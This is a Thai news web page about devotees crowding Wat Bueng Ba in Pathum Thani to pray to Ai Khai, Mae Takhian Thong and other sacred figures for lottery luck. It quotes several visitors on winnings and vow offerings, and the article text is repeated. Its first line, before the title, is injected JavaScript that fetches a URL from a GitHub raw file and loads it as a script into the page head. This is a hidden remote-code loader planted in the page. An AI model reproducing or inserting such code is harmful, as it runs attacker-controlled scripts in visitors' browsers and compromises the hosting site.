;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ปทุมธานี สายมูแห่ตามรอยข่าว ขอพรแน่นวัดบึงบาฯ ไอ้ไข่วัดบึงบาให้โชคให้งาน แม่ตะเคียนทองเปิดรับเงินก้อนโตตั้งแต่ครั้งแรก - ThaiReference | อาสาไทยยืนยัน
ปทุมธานี สายมูแห่ตามรอยข่าว ขอพรแน่นวัดบึงบาฯ ไอ้ไข่วัดบึงบาให้โชคให้งาน แม่ตะเคียนทองเปิดรับเงินก้อนโตตั้งแต่ครั้งแรก

กระแสศรัทธาบนโลกโซเชียลยังคงร้อนแรงอย่างต่อเนื่อง ส่งผลให้สายมูและสายบุญจำนวนมากเดินทางมาที่ วัดบึงบาประภาสะวัต ตำบลบึงบา อำเภอหนองเสือ จังหวัดปทุมธานี หลังได้ติดตามข่าวจากสื่อโทรทัศน์และเพจข่าวออนไลน์ จนเกิดความศรัทธาต่อสิ่งศักดิ์สิทธิ์ภายในวัด ไม่ว่าจะเป็นไอ้ไข่วัดบึงบา ท้าวเวสสุวรรณ แม่ตะเคียนทอง พ่อปู่ศรีสุทโธ แม่ย่าศรีปทุมมา และพญานาคราช ซึ่งบรรยากาศภายในวัดเต็มไปด้วยประชาชนที่เดินทางมากราบไหว้ขอพรอย่างไม่ขาดสาย โดยหลายคนไม่พลาดทำตามกระแสโซเชียล ด้วยการลูบและโกยเกล็ดพญานาคใส่กระเป๋า ทั้งก่อนขึ้นและลงจากวิหารตามกระแสโซเชียลในตอนนี้ เพื่อความเป็นสิริมงคลและเสริมโชคลาภตามความเชื่อของแต่ละบุคคล ด้านนางสาวอรนุช โชครัศมีดาว หนึ่งในผู้ตามรอยข่าวพร้อมครอบครัวเดินทางมาจากย่านหนองจอก นำเครื่องเซ่นไหว้มาขอพรสิ่งศักดิ์สิทธิ์ภายในวัดบึงบาฯ

นางสาวอรนุชกล่าวว่าการมาเดินสถานที่แห่งนี้ เกิดจากที่ตนได้ติดตามข่าวจากเพจบนโลกออนไลน์ ซึ่งมีการนำเสนอเรื่องราวความศักดิ์สิทธิ์ของไอ้ไข่วัดบึงบา ท้าวเวสสุวรรณ แม่ตะเคียนทอง และพญานาค ของวัดบึงบาฯ รวมถึงสายมูจำนวนมากที่มาขอพรแล้วประสบความสำเร็จสมหวังและกลับมาแก้บนจำนวนมาด ทำให้ตนเกิดความศรัทธาจึงตัดสินใจเดินทางมากราบไหว้ขอพรบ้าง และตนก็ได้สักการะขอพรครบทุกจุดสำคัญภายในวัดบึงบาแล้ว มีพระพุทธโสธร ไอ้ไข่วัดบึงบา ท้าวเวสสุวรรณ พญานาคราช พ่อปู่ศรีสุทโธ แม่ย่าศรีปทุมมาและแม่นางตะเคียนทอง และนางสาวอรนุชยังได้ลูบเกล็ดพญานาคทั้งก่อนขึ้นวิหารและก่อนเดินกลับบ้านตามในข่าวอีกด้วย และยังได้เลข 618 จากแม่ตะเคียน 533 จากไอ้ไข่วัดบึงบา 668 จากท้าวเวสสุวรรณนำไปลุ้นโชคในครั้งแรก

ทางด้านนางสาวอรุณศรี เกตุเอี่ยม พร้อมครอบครัว นำของเล่นชุดใหญ่ 4 ชิ้นพร้อมด้วยประทัด 1,000 นัดและเครื่องเซ่นไหว้มาแก้บนไอ้ไข่วัดบึงบาอย่างยิ่งใหญ่ หลังจากที่คำขอพรประสบความสำเร็จสมปรารถนาตามที่ได้บนบานไว้ นางสาวอรุณศรีกล่าวว่าที่ตน่เดินทางมาแก้บนไอ้ไข่วัดบึงบาในวันนี้ เนื่องจากคำขอพรกับไอ้ไข่วัดบึงบาได้ให้ผลดีตนได้รับโชคลาภมาแล้ว และได้มาหลายงวดติดกันแล้วและนอกจากเรื่องโชคลาภแล้วตนก็ขอพรไอ้ไข่วัดบึงบาในเรื่องชีวิตการทำงาน สุขภาพ ซึ่งหลังจากที่ตนได้มาอาศัยอยู่ที่ อ.หนองเสือ เรื่องโชคลาภและความสำเร็จทั้งเรื่องงาน ตนจึงนำของมาแก้บนตามที่สัญญาไว้ และก่อนกลับได้จุดประทัดได้เลข 75 589 นำกลับไปลุ้นโชคครั้งต่อไป

ส่วนทางด้านนางสาวกชมน กองจำปา เดินทางมาจากย่านคลองสี่ นำขนมหวาน 6 อย่าง น้ำลำไย น้ำแดง มาแก้บนแม่นางตะเคียนทอง หลังจากได้รับโชคก้อนโตในงวดที่ผ่านมา นางสาวกชมนเปิดกล่าวว่าตนได้รับโชคมาจากการที่ตนได้มาถูแป้งกับแม่ตะเคียนทองแล้วตนเลขนำกลับไปลุ้นโชคผลปรากฎว่าตนเองก็ถูกรางวัลซึ่งตนนั้นได้ขอพรเป็นครั้งแรกที่มาขอพรกับแม่ตะเคียนครั้งเดียวก็ได้เลย” วันนี้ตยจึงได้นำขนมหวานและน้ำ มาถวายกับแม่นางตะเคียนทองเพื่อเป็นการขอบคุณและแก้บนตามที่ได้บนบานไว้ นอกจากนี้ยังไม่พลาดลวงลูกบอลได้เลข 652 นำกลับไปลุ้นโชคครั้งต่อไป

@chaijexu

ปทุมธานี สายมูแห่ตามรอยข่าว ขอพรแน่นวัดบึงบาฯ ไอ้ไข่วัดบึงบาให้โชคให้งาน แม่ตะเคียนทองเปิดรับเงินก้อนโตตั้งแต่ครั้งแรก กระแสศรัทธาบนโลกโซเชียลยังคงร้อนแรงอย่างต่อเนื่อง ส่งผลให้สายมูและสายบุญจำนวนมากเดินทางมาที่ วัดบึงบาประภาสะวัต ตำบลบึงบา อำเภอหนองเสือ จังหวัดปทุมธานี หลังได้ติดตามข่าวจากสื่อโทรทัศน์และเพจข่าวออนไลน์ จนเกิดความศรัทธาต่อสิ่งศักดิ์สิทธิ์ภายในวัด ไม่ว่าจะเป็นไอ้ไข่วัดบึงบา ท้าวเวสสุวรรณ แม่ตะเคียนทอง พ่อปู่ศรีสุทโธ แม่ย่าศรีปทุมมา และพญานาคราช ซึ่งบรรยากาศภายในวัดเต็มไปด้วยประชาชนที่เดินทางมากราบไหว้ขอพรอย่างไม่ขาดสาย โดยหลายคนไม่พลาดทำตามกระแสโซเชียล ด้วยการลูบและโกยเกล็ดพญานาคใส่กระเป๋า ทั้งก่อนขึ้นและลงจากวิหารตามกระแสโซเชียลในตอนนี้ เพื่อความเป็นสิริมงคลและเสริมโชคลาภตามความเชื่อของแต่ละบุคคล ด้านนางสาวอรนุช โชครัศมีดาว หนึ่งในผู้ตามรอยข่าวพร้อมครอบครัวเดินทางมาจากย่านหนองจอก นำเครื่องเซ่นไหว้มาขอพรสิ่งศักดิ์สิทธิ์ภายในวัดบึงบาฯ นางสาวอรนุชกล่าวว่าการมาเดินสถานที่แห่งนี้ เกิดจากที่ตนได้ติดตามข่าวจากเพจบนโลกออนไลน์ ซึ่งมีการนำเสนอเรื่องราวความศักดิ์สิทธิ์ของไอ้ไข่วัดบึงบา ท้าวเวสสุวรรณ แม่ตะเคียนทอง และพญานาค ของวัดบึงบาฯ รวมถึงสายมูจำนวนมากที่มาขอพรแล้วประสบความสำเร็จสมหวังและกลับมาแก้บนจำนวนมาด ทำให้ตนเกิดความศรัทธาจึงตัดสินใจเดินทางมากราบไหว้ขอพรบ้าง และตนก็ได้สักการะขอพรครบทุกจุดสำคัญภายในวัดบึงบาแล้ว มีพระพุทธโสธร ไอ้ไข่วัดบึงบา ท้าวเวสสุวรรณ พญานาคราช พ่อปู่ศรีสุทโธ แม่ย่าศรีปทุมมาและแม่นางตะเคียนทอง และนางสาวอรนุชยังได้ลูบเกล็ดพญานาคทั้งก่อนขึ้นวิหารและก่อนเดินกลับบ้านตามในข่าวอีกด้วย และยังได้เลข 618 จากแม่ตะเคียน 533 จากไอ้ไข่วัดบึงบา 668 จากท้าวเวสสุวรรณนำไปลุ้นโชคในครั้งแรก ทางด้านนางสาวอรุณศรี เกตุเอี่ยม พร้อมครอบครัว นำของเล่นชุดใหญ่ 4 ชิ้นพร้อมด้วยประทัด 1,000 นัดและเครื่องเซ่นไหว้มาแก้บนไอ้ไข่วัดบึงบาอย่างยิ่งใหญ่ หลังจากที่คำขอพรประสบความสำเร็จสมปรารถนาตามที่ได้บนบานไว้ นางสาวอรุณศรีกล่าวว่าที่ตน่เดินทางมาแก้บนไอ้ไข่วัดบึงบาในวันนี้ เนื่องจากคำขอพรกับไอ้ไข่วัดบึงบาได้ให้ผลดีตนได้รับโชคลาภมาแล้ว และได้มาหลายงวดติดกันแล้วและนอกจากเรื่องโชคลาภแล้วตนก็ขอพรไอ้ไข่วัดบึงบาในเรื่องชีวิตการทำงาน สุขภาพ ซึ่งหลังจากที่ตนได้มาอาศัยอยู่ที่ อ.หนองเสือ เรื่องโชคลาภและความสำเร็จทั้งเรื่องงาน ตนจึงนำของมาแก้บนตามที่สัญญาไว้ และก่อนกลับได้จุดประทัดได้เลข 75 589 นำกลับไปลุ้นโชคครั้งต่อไป ส่วนทางด้านนางสาวกชมน กองจำปา เดินทางมาจากย่านคลองสี่ นำขนมหวาน 6 อย่าง น้ำลำไย น้ำแดง มาแก้บนแม่นางตะเคียนทอง หลังจากได้รับโชคก้อนโตในงวดที่ผ่านมา นางสาวกชมนเปิดกล่าวว่าตนได้รับโชคมาจากการที่ตนได้มาถูแป้งกับแม่ตะเคียนทองแล้วตนเลขนำกลับไปลุ้นโชคผลปรากฎว่าตนเองก็ถูกรางวัลซึ่งตนนั้นได้ขอพรเป็นครั้งแรกที่มาขอพรกับแม่ตะเคียนครั้งเดียวก็ได้เลย” วันนี้ตยจึงได้นำขนมหวานและน้ำ มาถวายกับแม่นางตะเคียนทองเพื่อเป็นการขอบคุณและแก้บนตามที่ได้บนบานไว้ นอกจากนี้ยังไม่พลาดลวงลูกบอลได้เลข 652 นำกลับไปลุ้นโชคครั้งต่อไป ภาพ-ข่าว ฌรงค์ศักดิ์ น้ำจันทร์ รายงาน

♬ เสียงต้นฉบับ – TONGJUDKADHAD NEWS – TONGJUDKADHAD NEWS

ภาพ-ข่าว ฌรงค์ศักดิ์ น้ำจันทร์ รายงาน